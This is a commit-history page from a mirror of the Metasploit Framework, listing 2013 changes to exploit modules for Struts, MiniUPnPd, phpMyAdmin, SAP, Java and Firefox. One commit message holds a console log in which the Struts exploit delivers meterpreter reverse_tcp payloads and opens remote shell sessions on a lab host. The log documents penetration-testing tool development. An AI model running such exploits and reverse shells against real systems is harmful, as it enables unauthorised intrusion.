infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
18,866 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

950 Commits (04c2a7367d63462eb6054859b554060e617d9229)

Author SHA1 Message Date
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
Dejan Lukan 8ced3483de Deleted some undeeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb 
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯in `call'
lib/msf/core/thread_manager.rb💯in `block in spawn'

Uses path instead of path_tmp in error messages.
 2013-06-04 11:19:28 +10:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
Steve Tornio 80f1e98952 added osvdb refs 2013-06-01 07:04:43 -05:00
jvazquez-r7 146a30ec4d Do minor cleanup for struts_include_params 2013-05-31 01:01:15 -05:00
jvazquez-r7 a7a754ae1f Land #1870, @Console exploit for Struts includeParams injection 2013-05-31 00:59:33 -05:00
Console eb4162d41b boolean issue fix 2013-05-30 18:15:33 +01:00
Console 5fa8ecd334 removed magic number 109 
now calculated from the actual length of all static URL elements
 2013-05-30 17:40:43 +01:00
Console 47524a0570 converted request params to hash merge operation 2013-05-30 15:36:01 +01:00
Console 51879ab9c7 removed unnecessary lines 2013-05-30 15:15:10 +01:00
Console abb0ab12f6 Fix msftidy compliance 2013-05-30 13:10:24 +01:00
Console 5233ac4cbd Progress bar instead of message spam. 2013-05-30 13:08:43 +01:00
Console fb388c6463 Chunk length is now "huge" for POST method 
minor changes to option text and changed HTTPMETHOD to an enum.
 2013-05-30 11:30:24 +01:00
Console ab6a2a049b Fix issue with JAVA meterpreter failing to work. 
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
 2013-05-30 10:35:29 +01:00
Console d70526f4cc Renamed as per suggestion 2013-05-30 09:29:26 +01:00
Console 7c38324b76 Considered using the bourne stager. 
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
 2013-05-29 14:21:23 +01:00
Console ec315ad50d Modified URI handling to make use of target_uri and vars_get/post. 
Added support for both GET and POST methods as both are vulnerable to
this exploit.
 2013-05-29 12:56:34 +01:00
Console b39531cea6 Added references 2013-05-28 23:15:10 +01:00
Console 7b43117d87 Added RCE for Struts versions earlier than 2.3.14.2 
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
 2013-05-28 18:26:57 +01:00
James Lee 9843dc4cb4 Land #1708, android meterpreter 
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
 2013-05-28 12:19:45 -05:00
Tod Beardsley 75d6c8079a Spelling, whitespace 
Please be sure to run msftidy.rb on new modules. Thanks!
 2013-05-28 10:03:37 -05:00
sinn3r 81ad280107 Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE 
Chained exploit using CVE-2013-0758 and CVE-2013-0757
 2013-05-23 12:21:10 -05:00
sinn3r 67861794f6 Fix automatic payload selection 2013-05-22 22:37:18 -05:00
sinn3r 23fe3146dc Extra print_status I don't want 2013-05-22 14:38:30 -05:00
sinn3r 0e6576747a Fix target selection probs, and swf path 2013-05-22 14:34:00 -05:00
Joe Vennix aae4768563 Fix whitespace issues from msftidy. 2013-05-21 14:31:36 -05:00
Joe Vennix eaeb10742a Add some comments and clean some things up. 2013-05-21 14:01:14 -05:00
Joe Vennix 978aafcb16 Add DEBUG option, pass args to .encoded_exe(). 2013-05-21 14:01:14 -05:00
Joe Vennix ee8a97419c Add some debug print calls to investigate Auto platform selection. 2013-05-21 14:01:13 -05:00
Joe Vennix 60fdf48535 Use renegerate_payload(cli, ...). 2013-05-21 14:01:13 -05:00
James Lee f4498c3916 Remove $Id tags 
Also adds binary coding magic comment to a few files
 2013-05-20 16:21:03 -05:00
James Lee 3009bdb57e Add a few more references for those without 2013-05-16 14:32:02 -05:00
h0ng10 378f0fff5b added missing comma 2013-05-16 18:59:46 +02:00
Joe Vennix 1a5c747bb9 Update description. 2013-05-15 23:52:51 -05:00
Joe Vennix 178a43a772 Whitespace tweaks and minor bug fix. Wrong payloads still run. 2013-05-15 23:47:04 -05:00
Joe Vennix f4b6db8c49 Tweak whitespace. 2013-05-15 23:35:59 -05:00
Joe Vennix a7d79e2a51 Oops, don't cache payload_filename. 2013-05-15 23:34:14 -05:00
Joe Vennix 4d5c4f68cb Initial commit, works on three OSes, but automatic mode fails. 2013-05-15 23:32:02 -05:00
James Lee 61afe1449e Landing #1275, bash cmdstager 
Conflicts:
	lib/rex/exploitation/cmdstager.rb

Conflict was just the $Id$ tag, which is no longer used anyway.
 2013-05-15 10:44:05 -05:00
sinn3r 41e9f35f3f Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform 2013-05-14 14:48:16 -05:00
Tod Beardsley e3384439ed 64-bit, not '64 bits' 2013-05-13 15:40:17 -05:00
jvazquez-r7 495f1e5013 Add multi platform module for SAP MC exec exploit 2013-05-12 08:46:00 -05:00
jvazquez-r7 4147a27216 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 2013-05-09 17:00:11 -05:00
jvazquez-r7 6842432abb Land #1678, @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit 2013-05-09 16:52:01 -05:00
jvazquez-r7 e939de583c Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec 2013-05-07 22:46:39 -05:00
jvazquez-r7 5f59d9f723 Move sap_soap_rfc_sxpg_command_exec to multi dir 2013-05-07 22:46:04 -05:00
jvazquez-r7 ab60e0bfb7 Fix print message 2013-05-07 22:41:15 -05:00
jvazquez-r7 24bad9c15c Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform 2013-05-07 17:03:10 -05:00
jvazquez-r7 76f6d9f130 Move module to multi-platform location 2013-05-07 17:01:56 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238) 
[Closes #1772]
 2013-04-28 12:17:16 -05:00
Meatballs ccb630eca2 Whitespace and change default user 2013-04-27 10:39:27 +01:00
Meatballs 209188bc22 Add refs and use targeturi 2013-04-27 10:35:49 +01:00
Meatballs 3ac041386b Add php version to check 2013-04-26 23:59:49 +01:00
Meatballs e25fdebd8d Add php version to check 2013-04-26 23:58:08 +01:00
Meatballs cd842df3e2 Correct phpMyAdmin 2013-04-26 23:38:27 +01:00
Meatballs 6bb2af7cee Add pma url 2013-04-26 23:37:26 +01:00
James Lee a0c1b6d1ce Clear out PMA's error handler 
* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
 2013-04-26 15:25:09 -05:00
Meatballs 1f2cab7aef Tidyup and getcookies 2013-04-26 20:26:04 +01:00
Meatballs 0901d00da5 Remove redundant pay opts 2013-04-26 19:26:29 +01:00
Meatballs a17d61897d Change to send_rq_cgi 2013-04-26 19:19:11 +01:00
Meatballs 54233e9fba Better entropy 2013-04-26 17:46:43 +01:00
Meatballs c8da13cfa0 Add some entropy in request 2013-04-26 17:34:17 +01:00
Meatballs a043d3b456 Fix auth check and cookie handling 2013-04-26 17:10:24 +01:00
Meatballs 025315e4e4 Move to http 2013-04-26 15:42:26 +01:00
Meatballs 9ad19ed2bf Final tidyup 2013-04-26 15:41:28 +01:00
Meatballs c7ac647e4e Initial attempt lfi 2013-04-26 14:32:18 +01:00
jvazquez-r7 bf0375f0e9 Fix @jlee-r7's feedback 2013-04-25 18:43:21 -05:00
jvazquez-r7 8eea476cb8 Build the jnlp uri when resource is available 2013-04-25 18:43:21 -05:00
jvazquez-r7 cc961977a2 Add bypass for click2play 2013-04-25 18:43:21 -05:00
jvazquez-r7 ece36c0610 Update references for the las Java exploit 2013-04-22 21:55:04 -05:00
jvazquez-r7 1365dfe68c Add Oracle url 2013-04-20 01:43:14 -05:00
jvazquez-r7 b99fc06b6f description updated 2013-04-20 01:43:14 -05:00
jvazquez-r7 19f2e72dbb Added module for Java 7u17 sandboxy bypass 2013-04-20 01:43:13 -05:00
Tod Beardsley 873bdbab57 Removing APSB13-03, not ready. 
This was landed by @todb-r7 on #1709 but that was premature. #1717 was
a proposed set of fixes, but it didn't go far enough.

@jhart-r7 and @jvazquez-r7 should revisit this module for sure, there's
some good stuff in there, but it's not ready for a real release quite
yet. Take a look at the issues discussed in those PRs and open a new PR
with a new module?

Sorry for the switcheroo, not trying to be a jerk.

[Closes #1717]
 2013-04-15 13:36:47 -05:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
Jon Hart 8a98b1af4a Added command mode, plus fixed the dropping of payloads 2013-04-07 15:39:38 -07:00
Jon Hart f482496795 Initial commit of an exploit module for the CVEs covered by APSB13-03. 
Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
 2013-04-06 20:08:50 -07:00
Tod Beardsley e4d901d12c Space at EOL (msftidy) 2013-04-03 09:20:01 -05:00
jvazquez-r7 315abd8839 fix Privileged field 2013-03-30 19:39:01 +01:00
jvazquez-r7 a46805d95d description updated 2013-03-30 19:36:35 +01:00
jvazquez-r7 c880a63e75 Added module for ZDI-13-049 2013-03-30 19:35:04 +01:00
jvazquez-r7 714fc83cfe Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into bwall-Ra1NX_pubcall 2013-03-29 19:58:06 +01:00
bwall 21ea1c9ed4 Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall 2013-03-29 13:29:38 -04:00
bwall 10d9e86b42 Renamed file to be all lower case 2013-03-29 13:29:05 -04:00
jvazquez-r7 cd1820d769 trying to solve irc comm issues 2013-03-29 12:54:57 +01:00
bwall 6cf44d9c85 added a 3 message window for recieving the check response 2013-03-28 21:14:52 -04:00
jvazquez-r7 29ad9939e1 cleanup for stunshell_eval 2013-03-28 15:11:20 +01:00
jvazquez-r7 514aed404c Merge branch 'STUNSHELL_eval' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_eval 2013-03-28 15:10:57 +01:00
jvazquez-r7 9b18eb858b cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00